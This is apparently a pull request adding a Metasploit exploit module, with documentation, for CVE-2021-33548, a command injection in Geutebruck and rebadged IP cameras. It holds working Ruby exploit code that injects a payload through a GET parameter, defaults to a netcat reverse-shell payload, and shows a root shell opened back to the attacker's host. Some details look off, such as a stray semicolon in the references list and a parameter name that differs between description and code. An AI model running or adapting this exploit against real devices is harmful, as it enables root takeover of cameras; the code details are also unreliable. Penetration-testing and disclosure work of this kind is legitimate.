### PR TITLE
Add CVE-2021-33548 exploit for Geutebruck G-CAM

### DIFF
--- a/documentation/modules/exploit/linux/http/geutebruck_factory_exec.md
+++ b/documentation/modules/exploit/linux/http/geutebruck_factory_exec.md
@@ -1,0 +1,70 @@
+## Vulnerable Application
+
+The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.27, firmware version 1.12.13.2 or firmware version 1.12.14.5:
+* Encoder and E2 Series Camera models:
+  * G-Code:
+    * EEC-2xxx
+  * G-Cam:
+    * EBC-21xx
+    * EFD-22xx
+    * ETHC-22xx
+    * EWPC-22xx
+
+Many brands use the same firmware:
+  * UDP Technology (which is also the supplier of the firmware for the other vendors)
+  * Ganz
+  * Visualint
+  * Cap
+  * THRIVE Intelligence
+  * Sophus
+  * VCA
+  * TripCorps
+  * Sprinx Technologies
+  * Smartec
+  * Riva
+
+This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running the latest firmware version 1.12.0.27.
+
+### Description
+
+This module bypass & exploits an authenticated OS command injection vulnerability (CVE-2021-33548) within the
+`state` GET parameter of /uapi-cgi/factory.cgi.
+This issue occurs due to a lack of validation on the `state` parameter, which allows an attacker to
+inject a command alongside other parameters passed to the CGI, at which point the server will then interpret the new string as a separate command to be executed. Successful exploitation will result in
+remote code execution as the `root` user.
+
+Users can find additional details of this vulnerability on the blogpost page at https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.
+
+## Verification Steps
+
+  1. Start the camera using default configuration
+  2. Launch msfconsole
+  3. Do: `use exploit/linux/http/geutebruck_factory_exec`
+  4. Do: `set lhost <metasploit_ip>`
+  5. Do: `set rhosts <camera_ip>`
+  6. Do: `check` to be sure the target is vulnerable
+  7. Do: `exploit`
+  8. You should get a shell
+
+## Scenarios
+### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.0.27.
+```
+msf6 > use exploit/linux/http/geutebruck_factory_exec
+[*] Using configured payload cmd/unix/reverse_netcat_gaping
+msf6 exploit(linux/http/geutebruck_factory_exec) > set lhost 192.168.14.1
+lhost => 192.168.14.1
+msf6 exploit(linux/http/geutebruck_factory_exec) > set rhosts 192.168.14.58
+rhosts => 192.168.14.58
+msf6 exploit(linux/http/geutebruck_factory_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.14.1:4444
+[*] 192.168.14.58:80 - Attempting to exploit...
+[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2021-02-23 13:37:28 +0200
+pwd
+
+/tmp/www_ramdisk/uapi-cgi/admin
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-g3532e87a #1 PREEMPT Tue May 12 18:00:46 KST 2020 armv5tejl GNU/Linux
+```

--- a/modules/exploits/linux/http/geutebruck_factory_exec.rb
+++ b/modules/exploits/linux/http/geutebruck_factory_exec.rb
@@ -1,0 +1,100 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Geutebruck factory.cgi Remote Command Execution',
+        'Description' => %q{
+          This module bypass & exploits an authenticated arbitrary command execution vulnerability within the 'state'
+          GET parameter of the /uapi-cgi/factory.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
+          ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware 
+          versions 1.12.13.2 and 1.12.14.5.
+          Successful exploitation results in remote code execution as the root user.
+        },
+
+         'Author' => [
+       'Titouan Lazard - RandoriSec', # Discovery
+       'Ibrahim Ayadhi - RandoriSec', # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['CVE', 'CVE-2021-33548'],
+            [ 'URL', 'http://geutebruck.com' ],
+            ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'];
+            ['URL','https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
+          ],
+        'DisclosureDate' => '2021-07-08',
+        'Privileged' => true,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Targets' => [
+          [ 'Automatic Target', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' =>
+         {
+           'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+         }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to the tmpapp page', '/../uapi-cgi/factory.cgi']),
+      ]
+    )
+  end
+
+  def firmware
+    begin
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => '/brand.xml'
+      )
+      unless res
+        vprint_error 'Connection failed'
+        return CheckCode::Unknown
+      end
+
+      res_xml = res.get_xml_document
+      @version = res_xml.at('//firmware').text
+      return true
+    end
+  end
+
+  def check
+    result = firmware
+    return result unless result == true
+
+    version = Gem::Version.new(@version)
+    vprint_status "Found Geutebruck version #{version}"
+    if version <= Gem::Version.new('1.12.0.27') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{rhost}:#{rport} - Attempting to exploit...")
+    uri = "/" + Rex::Text.rand_hostname + target_uri.path
+    send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => uri,
+        'vars_get' => { 'preserve' =>  "test$(#{payload.encoded})"}
+      }
+    )
+  end
+end


### PR DESCRIPTION
This exploit a simple OS command injection (CVE-2021-33548) in the web interface of the Geutebruck G-Cam and G-Code products.
Many brands use the same firmware:
  * UDP Technology (which is also the supplier of the firmware for the other vendors)
  * Ganz
  * Visualint
  * Cap
  * THRIVE Intelligence
  * Sophus
  * VCA
  * TripCorps
  * Sprinx Technologies
  * Smartec
  * Riva
 
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 and the blogpost about the issue : https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/geutebruck_factory_exec`
- [ ] `set lhost <metasploit_ip>`
- [ ] `set rhosts <camera_ip>`
- [ ] `check` to be sure the target is vulnerable
- [ ] `exploit`
- [ ] You should get a shell

## Demonstration
### Exploitation 
```
msf6 > use exploit/linux/http/geutebruck_factory_exec
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/geutebruck_factory_exec) > set lhost 192.168.14.1
lhost => 192.168.14.1
msf6 exploit(linux/http/geutebruck_factory_exec) > set rhosts 192.168.14.58
rhosts => 192.168.14.58
msf6 exploit(linux/http/geutebruck_factory_exec) > exploit

[*] Started reverse TCP handler on 192.168.14.1:4444
[*] 192.168.14.58:80 - Attempting to exploit...
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2021-02-23 13:37:28 +0200
pwd

/tmp/www_ramdisk/uapi-cgi/admin
id
uid=0(root) gid=0(root)
uname -a
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-g3532e87a #1 PREEMPT Tue May 12 18:00:46 KST 2020 armv5tejl GNU/Linux
```



